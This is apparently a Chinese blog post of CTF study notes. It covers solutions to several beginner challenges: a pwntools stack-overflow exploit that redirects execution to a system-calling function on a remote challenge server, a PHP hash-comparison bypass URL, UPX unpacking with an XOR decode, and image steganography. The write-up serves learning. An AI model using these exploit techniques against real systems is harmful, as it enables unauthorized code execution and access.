当前位置: 首页 > news >正文

2.20学习

crypto

buu-这是什么

下载附件后打开看到是apk文件,试试直接用记事本打开,看到乱码以外,还有一堆有规律的符号,了解后发现是jsfuck编码,搜索在线工具解码就行

misc

buu-[BJDCTF2020]藏藏藏

下载附件,得到的是一个图片,没有信息,应该为图片隐写在虚拟机binwalk一下可以看到有一个zip,进行foremost提取,得到一个zip文件和一个图片,我们解压zip文件,得到一个文档,是二维码,将二维码另存为图片扫描一下,得到flag

pwn

buu-jarvisoj_level0

下载附件,checksec文件,没有保护机制64位,用ida64打开在main函数,点击f5反编译,看到了function双击查看在function函数中看到了read函数,这里存在栈溢出

 然后找到callsystem,返回地址为0x400596编写exp(这里的偏移量为什么是0x88还未明白,待后续)

from pwn import*
r=remote('node5.buuoj.cn',27608)
r.sendline(b'a'*(0x88)+p64(0x400596))
r.interactive()

re

nss-[SWPUCTF 2022 新生赛]upx

下载附件解压后查壳,64位,upx的壳

进行upx脱壳,进入含有upx.exe的文件夹,然后输入命令去壳成功后得到的是No packed然后用ida64打开这个文件,找到main函数,点击f5进行反编译根据这段关键的代码,就是将输入的字符串v6遍历,每一个与2进行异或后与v4比对,相同就说明输入的是flag。

逆向写代码,将v4与2异或得到的就是v6

a='LQQAVDyWRZ]3q]zmpf]uc{]vm]glap{rv]dnce'
flag=''
for i in range(len(a)):
    flag+=chr(ord(a[i])^2)
print(flag)

 

web

bugku-前女友

打开环境后看到了一段文字,没有我们需要的什么信息,也没有看到任何按钮,但是注意到说的“链接”,这个链接勾起了“php是世界上最好的语言”的回忆,所以这个链接应该是在页面中的,且是php代码,点击f12查看源代码,展开后可以看到有一个地方(在‘一个’与‘链接’的中间有其他信息),所以我们试着在这里点击试试成功得到一个链接这里用到我们之前学过的哈希碰撞,就得到flag

http://117.72.52.127:13324/?v1[]=1&v2[]=2&v3[]=1

相关文章:

  • minio作为K8S后端存储
  • 悬挂引用,智能指针 裸指针 悬挂指针
  • 项目汇报PPT转视频制作 | 有字幕和配音版
  • EasyPoi系列之通用导入接口设计
  • 二分查找!!!!
  • 【OpenCV】OpenCV 中各模块及其算子的详细分类
  • el-message自定义HTML包含按钮点击事件
  • 记录一个ES分词器不生效的解决过程
  • 知识库-搜索知识接口
  • Java链表全解析:从单向链表到双向链表的实现与优化
  • AI+战略解码 【制造企业数字化转型】
  • 【Scrapy】Scrapy教程7——存储数据
  • UE5从入门到精通之多人游戏编程常用函数
  • C++ Primer 类的静态成员
  • 人工智能驱动的自动驾驶:技术解析与发展趋势
  • 雷龙CS SD NAND(贴片式TF卡)测评体验
  • tp6上传文件大小超过了最大值+验证文件上传大小和格式函数
  • 支持向量机(SVM)在 NLP 中的使用场景
  • Redis常见问题排查
  • AI训练中的常用指令
  • 非法收受财物逾1648万,湖南原副厅级干部康月林一审被判十年半
  • 五一期间上海景观照明开启重大活动模式,外滩不展演光影秀
  • 央行回应美债波动:单一市场、单一资产变动对我国外储影响总体有限
  • 同款瑞幸咖啡竟差了6元,开了会员仍比别人贵!客服回应
  • 体坛联播|巴萨“三杀”皇马夺国王杯,陈妤颉破亚洲少年纪录
  • 乌克兰否认俄收复库尔斯克州,称战斗仍在持续